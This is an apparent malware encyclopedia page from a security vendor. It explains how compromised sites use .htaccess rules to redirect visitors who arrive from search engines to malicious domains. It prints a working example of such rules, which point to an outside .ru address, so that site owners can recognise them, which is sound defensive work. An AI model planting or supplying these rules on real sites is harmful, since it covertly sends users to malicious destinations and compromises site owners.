Sucuri Docs > Malware Encyclopedia > Conditional redirections

Conditional redirections

Conditional redirections are classified differently than the iframe/javascript ones because they are generally done though the HTTP headers (via .htaccess) to redirect users from certain browsers or locations to malware/malicious locations.

Referrer or user agent redirections

This happens when a user coming from a search engine (like Google) or certain user agent (Googlebot or MSIE) gets redirected to a malicious domain.

Example of .htaccess code doing the redirection

Anyone coming from a search engine, gets redirected to a russian site:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|altavista|ask|google|bing|yahoo).*$ [NC]
RewriteRule .* http://wp-twitt.ru/wp-image?5 [R,L]
Was this article helpful?